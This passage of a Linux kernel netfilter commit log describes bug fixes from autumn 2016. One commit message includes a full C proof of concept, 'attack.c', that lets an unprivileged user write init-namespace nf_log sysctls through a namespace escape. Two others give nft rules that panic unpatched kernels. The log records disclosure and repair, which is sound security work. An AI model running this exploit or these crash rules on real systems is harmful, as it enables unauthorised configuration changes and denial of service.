on SIP requests, so a fragmented TCP SIP packet from an allow header starting with INVITE,NOTIFY,OPTIONS,REFER,REGISTER,UPDATE,SUBSCRIBE Content-Length: 0 will not bet interpreted as an INVITE request. Also Request-URI must start with an alphabetic character. Confirm with RFC 3261 Request-Line = Method SP Request-URI SP SIP-Version CRLF Fixes: 30f33e6dee80 ("[NETFILTER]: nf_conntrack_sip: support method specific request/response handling") Signed-off-by: Ulrich Weber <ulrich.weber@riverbed.com> Acked-by: Marco Angaroni <marcoangaroni@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27netfilter: nf_tables: fix race when create new element in dynsetLiping Zhang
Packets may race when create the new element in nft_hash_update: CPU0 CPU1 lookup_fast - fail lookup_fast - fail new - ok new - ok insert - ok insert - fail(EEXIST) So when race happened, we reuse the existing element. Otherwise, these *racing* packets will not be handled properly. Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates") Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27netfilter: nf_tables: fix *leak* when expr clone failLiping Zhang
When nft_expr_clone failed, a series of problems will happen: 1. module refcnt will leak, we call __module_get at the beginning but we forget to put it back if ops->clone returns fail 2. memory will be leaked, if clone fail, we just return NULL and forget to free the alloced element 3. set->nelems will become incorrect when set->size is specified. If clone fail, we should decrease the set->nelems Now this patch fixes these problems. And fortunately, clone fail will only happen on counter expression when memory is exhausted. Fixes: 086f332167d6 ("netfilter: nf_tables: add clone interface to expression operations") Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27netfilter: nft_dynset: fix panic if NFT_SET_HASH is not enabledLiping Zhang
When CONFIG_NFT_SET_HASH is not enabled and I input the following rule: "nft add rule filter output flow table test {ip daddr counter }", kernel panic happened on my system: BUG: unable to handle kernel NULL pointer dereference at (null) IP: [< (null)>] (null) [...] Call Trace: [<ffffffffa0590466>] ? nft_dynset_eval+0x56/0x100 [nf_tables] [<ffffffffa05851bb>] nft_do_chain+0xfb/0x4e0 [nf_tables] [<ffffffffa0432f01>] ? nf_conntrack_tuple_taken+0x61/0x210 [nf_conntrack] [<ffffffffa0459ea6>] ? get_unique_tuple+0x136/0x560 [nf_nat] [<ffffffffa043bca1>] ? __nf_ct_ext_add_length+0x111/0x130 [nf_conntrack] [<ffffffffa045a357>] ? nf_nat_setup_info+0x87/0x3b0 [nf_nat] [<ffffffff81761e27>] ? ipt_do_table+0x327/0x610 [<ffffffffa045a6d7>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [<ffffffffa059f21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [<ffffffff81702515>] nf_iterate+0x55/0x60 [<ffffffff81702593>] nf_hook_slow+0x73/0xd0 Because in rbtree type set, ops->update is not implemented. So just keep it simple, in such case, report -EOPNOTSUPP to the user space. Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates") Signed-off-by: Liping Zhang <zlpnobody@gmail.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-20netfilter: fix nf_queue handlingPablo Neira Ayuso
nf_queue handling is broken since e3b37f11e6e4 ("netfilter: replace list_head with single linked list") for two reasons: 1) If the bypass flag is set on, there are no userspace listeners and we still have more hook entries to iterate over, then jump to the next hook. Otherwise accept the packet. On nf_reinject() path, the okfn() needs to be invoked. 2) We should not re-enter the same hook on packet reinjection. If the packet is accepted, we have to skip the current hook from where the packet was enqueued, otherwise the packets gets enqueued over and over again. This restores the previous list_for_each_entry_continue() behaviour happening from nf_iterate() that was dealing with these two cases. This patch introduces a new nf_queue() wrapper function so this fix becomes simpler. Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list") Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-20netfilter: conntrack: restart gc immediately if GC_MAX_EVICTS is reachedNicolas Dichtel
When the maximum evictions number is reached, do not wait 5 seconds before the next run. CC: Florian Westphal <fw@strlen.de> Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com> Acked-by: Florian Westphal <fw@strlen.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-19netfilter: x_tables: suppress kmemcheck warningFlorian Westphal
Markus Trippelsdorf reports: WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff88001e605480) 4055601e0088ffff000000000000000090686d81ffffffff0000000000000000 u u u u u u u u u u u u u u u u i i i i i i i i u u u u u u u u ^ |RIP: 0010:[<ffffffff8166e561>] [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160 [..] [<ffffffff8166e561>] nf_register_net_hook+0x51/0x160 [<ffffffff8166eaaf>] nf_register_net_hooks+0x3f/0xa0 [<ffffffff816d6715>] ipt_register_table+0xe5/0x110 [..] This warning is harmless; we copy 'uninitialized' data from the hook ops but it will not be used. Long term the structures keeping run-time data should be disentangled from those only containing config-time data (such as where in the list to insert a hook), but thats -next material. Reported-by: Markus Trippelsdorf <markus@trippelsdorf.de> Suggested-by: Al Viro <viro@ZenIV.linux.org.uk> Signed-off-by: Florian Westphal <fw@strlen.de> Acked-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-18netfilter: nf_tables: avoid uninitialized variable warningArnd Bergmann
The newly added nft_range_eval() function handles the two possible nft range operations, but as the compiler warning points out, any unexpected value would lead to the 'mismatch' variable being used without being initialized: net/netfilter/nft_range.c: In function 'nft_range_eval': net/netfilter/nft_range.c:45:5: error: 'mismatch' may be used uninitialized in this function [-Werror=maybe-uninitialized] This removes the variable in question and instead moves the condition into the switch itself, which is potentially more efficient than adding a bogus 'default' clause as in my first approach, and is nicer than using the 'uninitialized_var' macro. Fixes: 0f3cd9b36977 ("netfilter: nf_tables: add range expression") Link: http://patchwork.ozlabs.org/patch/677114/ Signed-off-by: Arnd Bergmann <arnd@arndb.de> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17netfilter: nft_range: validate operation netlink attributePablo Neira Ayuso
Use nft_parse_u32_check() to make sure we don't get a value over the unsigned 8-bit integer. Moreover, make sure this value doesn't go over the two supported range comparison modes. Fixes: 9286c2eb1fda ("netfilter: nft_range: validate operation netlink attribute") Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17netfilter: nft_exthdr: fix error handling in nft_exthdr_init()Dan Carpenter
"err" needs to be signed for the error handling to work. Fixes: 36b701fae12a ('netfilter: nf_tables: validate maximum value of u32 netlink attributes') Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17netfilter: nf_tables: underflow in nft_parse_u32_check()Dan Carpenter
We don't want to allow negatives here. Fixes: 36b701fae12a ('netfilter: nf_tables: validate maximum value of u32 netlink attributes') Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17netfilter: nft_hash: add missing NFTA_HASH_OFFSET's nla_policyLiping Zhang
Missing the nla_policy description will also miss the validation check in kernel. Fixes: 70ca767ea1b2 ("netfilter: nft_hash: Add hash offset value") Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17netfilter: xt_ipcomp: add "ip[6]t_ipcomp" module alias nameLiping Zhang
Otherwise, user cannot add related rules if xt_ipcomp.ko is not loaded: # iptables -A OUTPUT -p 108 -m ipcomp --ipcompspi 1 iptables: No chain/target/match by that name. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17netfilter: xt_NFLOG: fix unexpected truncated packetLiping Zhang
Justin and Chris spotted that iptables NFLOG target was broken when they upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or "results in segfaults in ulogd-2.0.5". Because "struct nf_loginfo li;" is a local variable, and flags will be filled with garbage value, not inited to zero. So if it contains 0x1, packets will not be logged to the userspace anymore. Fixes: 7643507fe8b5 ("netfilter: xt_NFLOG: nflog-range does not truncate packets") Reported-by: Justin Piszcz <jpiszcz@lucidpixels.com> Reported-by: Chris Caputo <ccaputo@alt.net> Tested-by: Chris Caputo <ccaputo@alt.net> Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17netfilter: nft_dynset: fix element timeout for HZ != 1000Anders K. Pedersen
With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times higher than configured. Add proper conversion to/from jiffies, when interacting with userspace. I tested this on Linux 4.8.1, and it applies cleanly to current nf and nf-next trees. Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates") Signed-off-by: Anders K. Pedersen <akp@cohaesio.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-17netfilter: xt_hashlimit: Add missing ULL suffixes for 64-bit constantsGeert Uytterhoeven
On 32-bit (e.g. with m68k-linux-gnu-gcc-4.1): net/netfilter/xt_hashlimit.c: In function ‘user2credits’: net/netfilter/xt_hashlimit.c:476: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c:478: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c:480: warning: integer constant is too large for ‘long’ type ... net/netfilter/xt_hashlimit.c: In function ‘rateinfo_recalc’: net/netfilter/xt_hashlimit.c:513: warning: integer constant is too large for ‘long’ type Fixes: 11d5f15723c9f39d ("netfilter: xt_hashlimit: Create revision 2 to support higher pps rates") Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org> Acked-by: Vishwanath Pai <vpai@akamai.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-11netfilter: Fix slab corruption.Linus Torvalds
Use the correct pattern for singly linked list insertion and deletion. We can also calculate the list head outside of the mutex. Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list") Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Reviewed-by: Aaron Conole <aconole@bytheb.org> Signed-off-by: David S. Miller <davem@davemloft.net> net/netfilter/core.c | 108 ++++++++++++++++----------------------------------- 1 file changed, 33 insertions(+), 75 deletions(-)
2016-10-04netfilter: nft_limit: fix divided by zero panicLiping Zhang
After I input the following nftables rule, a panic happened on my system: # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second divide error: 0000 [#1] SMP [ ... ] RIP: 0010:[<ffffffffa059035e>] [<ffffffffa059035e>] nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit] Call Trace: [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables] [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat] [<ffffffff81753767>] ? ipt_do_table+0x327/0x610 [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat] [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4] [<ffffffff816f4aa2>] nf_iterate+0x62/0x80 [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0 [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0 [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0 [<ffffffff81703d3c>] ip_local_out+0x1c/0x40 This is because divisor is 64-bit, but we treat it as a 32-bit integer, then 0xf00000000 becomes zero, i.e. divisor becomes 0. Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04netfilter: fix namespace handling in nf_log_proc_dostringJann Horn
nf_log_proc_dostring() used current's network namespace instead of the one corresponding to the sysctl file the write was performed on. Because the permission check happens at open time and the nf_log files in namespaces are accessible for the namespace owner, this can be abused by an unprivileged user to effectively write to the init namespace's nf_log sysctls. Stash the "struct net *" in extra2 - data and extra1 are already used. Repro code: #define _GNU_SOURCE #include <stdlib.h> #include <sched.h> #include <err.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <stdio.h> char child_stack[1000000]; uid_t outer_uid; gid_t outer_gid; int stolen_fd = -1; void writefile(char *path, char *buf) { int fd = open(path, O_WRONLY); if (fd == -1) err(1, "unable to open thing"); if (write(fd, buf, strlen(buf)) != strlen(buf)) err(1, "unable to write thing"); close(fd); } int child_fn(void *p_) { if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC, NULL)) err(1, "mount"); /* Yes, we need to set the maps for the net sysctls to recognize us * as namespace root. */ char buf[1000]; sprintf(buf, "0 %d 1\n", (int)outer_uid); writefile("/proc/1/uid_map", buf); writefile("/proc/1/setgroups", "deny"); sprintf(buf, "0 %d 1\n", (int)outer_gid); writefile("/proc/1/gid_map", buf); stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY); if (stolen_fd == -1) err(1, "open nf_log"); return 0; } int main(void) { outer_uid = getuid(); outer_gid = getgid(); int child = clone(child_fn, child_stack + sizeof(child_stack), CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL); if (child == -1) err(1, "clone"); int status; if (wait(&status) != child) err(1, "wait"); if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) errx(1, "child exit status bad"); char *data = "NONE"; if (write(stolen_fd, data, strlen(data)) != strlen(data)) err(1, "write"); return 0; } Repro: $ gcc -Wall -o attack attack.c -std=gnu99 $ cat /proc/sys/net/netfilter/nf_log/2 nf_log_ipv4 $ ./attack $ cat /proc/sys/net/netfilter/nf_log/2 NONE Because this looks like an issue with very low severity, I'm sending it to the public list directly. Signed-off-by: Jann Horn <jann@thejh.net> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-30netfilter: xt_hashlimit: Fix link error in 32bit arch because of 64bit divisionVishwanath Pai
Division of 64bit integers will cause linker error undefined reference to `__udivdi3'. Fix this by replacing divisions with div64_64 Fixes: 11d5f15723c9 ("netfilter: xt_hashlimit: Create revision 2 to ...") Signed-off-by: Vishwanath Pai <vpai@akamai.com> Acked-by: Maciej Żenczykowski <maze@google.com> Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>